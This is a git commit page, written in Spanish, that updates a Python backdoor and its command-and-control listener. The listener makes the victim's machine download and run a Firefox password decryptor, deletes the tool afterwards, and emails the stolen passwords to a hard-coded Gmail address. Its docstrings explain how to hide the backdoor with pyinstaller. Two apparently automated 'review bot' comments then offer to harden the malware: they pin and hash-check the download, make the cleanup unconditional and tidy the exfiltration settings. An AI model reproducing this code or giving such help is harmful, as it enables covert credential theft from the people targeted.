Update backdoor & listener - C2

This commit is contained in:
Manuel Vergara 2024-02-01 19:18:06 +01:00
parent d505f6ee23
commit 3704f6c61e
3 changed files with 27 additions and 27 deletions



@ -1,6 +1,11 @@
# /usr/bin/env python3 # /usr/bin/env python3
""" """
Backdoor Backdoor
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole
pyinstaller --onefile --noconsole listener.py
""" """
import signal import signal
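Review bot: The added docstring lines tell the reader to build this module with `pyinstaller --onefile --noconsole listener.py`, yet the docstring's own title is "Backdoor" and the identical command appears verbatim in the listener's docstring in the next file section, so one of the two file names is presumably wrong. If this section is the backdoor script, the line should name that file, e.g. `pyinstaller --onefile --noconsole backdoor.py`; the page does not show the section's path, so confirm against the actual file name first. Unrelated to the change, the unchanged first line `# /usr/bin/env python3` lacks the `!` of a shebang (`#!/usr/bin/env python3`), which only matters if the script is ever run directly on Unix. The module body continues past `import signal`, outside the hunk.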


@ -2,22 +2,20 @@
""" """
Listener para el backdoor Listener para el backdoor
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole Para hacer invisible el backdoor se puede utilizar pyinstaller con la
opción --noconsole
pyinstaller --onefile --noconsole listener.py pyinstaller --onefile --noconsole listener.py
""" """
import dotenv import dotenv
import os import os
import requests
import signal import signal
import smtplib import smtplib
import socket import socket
import sys import sys
import tempfile
from email.mime.text import MIMEText from email.mime.text import MIMEText
from termcolor import colored from termcolor import colored
@ -108,12 +106,12 @@ class Listener:
Consigue el profile de firefox Consigue el profile de firefox
""" """
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
command = f"dir {path}"
try: try:
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
command = f"dir {path}"
output_command_dir = self.execute_remotely(command) output_command_dir = self.execute_remotely(command)
profile_line = next(line for line in output_command_dir.split( profile_line = next(line for line in output_command_dir.split(
@ -129,35 +127,32 @@ class Listener:
return None return None
def get_firefox_passwords(self, username, profiles): def get_firefox_passwords(self, username, profiles):
""" """
Extrae las contraseñas guardadas en un profile de firefox Extrae las contraseñas guardadas en un profile de firefox
""" """
url_download = "https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py"
path_download = "%TEMP%\\firefox_decrypt.py"
options_download = "/transfer midescarga /download /priority normal"
command_download = f"bitsadmin {options_download} {url_download} {path_download}"
firefox_profile_path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}" firefox_profile_path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
command = f"python firefox_decrypt.py {firefox_profile_path}" try:
self.execute_remotely(command_download)
r = requests.get( command = f"python %TEMP%\\firefox_decrypt.py {firefox_profile_path}"
"https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py")
self.execute_remotely(f"dir C:\\Users\\{username}\\AppData\\Local\\Temp\\") passwords = self.execute_remotely(command)
print(execute_remotely("dir"))
command_copy = f"echo {r.content} > firefox_decrypt.py"
self.execute_remotely(command_copy)
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir) self.execute_remotely("del %TEMP%\\firefox_decrypt.py")
with open("firefox_decrypt.py", "wb") as f: except Exception as e:
f.write(r.content) print(f"\n[!] Error al obtener las contraseñas de Firefox.\nError: {e}")
passwords = execute_remotely(command) return None
os.remove("firefox_decrypt.py")
return passwords return passwords
@ -167,7 +162,7 @@ class Listener:
""" """
print(colored( print(colored(
"Programa \"Command & Control\" realizado con mucho cariño.\n", "Programa \"Command & Control\" realizado con mucho cariño.\n",
"blue" "blue"
)) ))
@ -210,7 +205,7 @@ class Listener:
if passwords: if passwords:
send_email( self.send_email(
"Decrypted Firefox Passwords INFO", "Decrypted Firefox Passwords INFO",
passwords, passwords,
"keyloggerseginf@gmail.com", "keyloggerseginf@gmail.com",
@ -235,5 +230,5 @@ class Listener:
if __name__ == "__main__": if __name__ == "__main__":
my_listener = Listener("192.168.2.105", 443) my_listener = Listener("192.168.1.119", 443)
my_listener.run() my_listener.run()
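Review bot: In the rewritten `get_firefox_passwords` (hunk `@ -129,35 +127,32 @@`) the helper script is fetched from the mutable `main` branch of a third-party repository straight onto the target and executed with no integrity check, so what actually runs depends on whatever GitHub serves at that moment — pin `url_download` to a specific commit SHA and compare the downloaded file's digest (e.g. the output of `certutil -hashfile %TEMP%\\firefox_decrypt.py SHA256`) against a known value before the `python` call. Separately, the `del %TEMP%\\firefox_decrypt.py` cleanup sits inside the `try`, so if the `python` invocation raises (interpreter missing, profile path wrong) the `except` path returns `None` and leaves the decryptor on disk; moving the delete into a `finally` keeps the cleanup unconditional. Whether `%TEMP%` in `path_download` is expanded at all depends on whether `execute_remotely` runs the command through `cmd.exe`, which is not visible in this diff, and `bitsadmin /transfer` requires an absolute local path, so that is worth verifying against the backdoor side. Also note the hard-coded recipient `keyloggerseginf@gmail.com` and listener address `192.168.1.119` in the later hunks would be better read from the `.env` the file already loads via `dotenv`.
```python
        # … unchanged: url_download / path_download / options_download / command_download / firefox_profile_path …
        try:
            self.execute_remotely(command_download)
            # TODO(review): verify the downloaded file's SHA256 against a pinned digest here
            # before executing it; the URL should reference a fixed commit, not `main`.
            command = f"python %TEMP%\\firefox_decrypt.py {firefox_profile_path}"
            passwords = self.execute_remotely(command)
        except Exception as e:
            print(f"\n[!] Error al obtener las contraseñas de Firefox.\nError: {e}")
            return None
        finally:
            # Remove the helper even when the python invocation fails.
            self.execute_remotely("del %TEMP%\\firefox_decrypt.py")
        return passwords
```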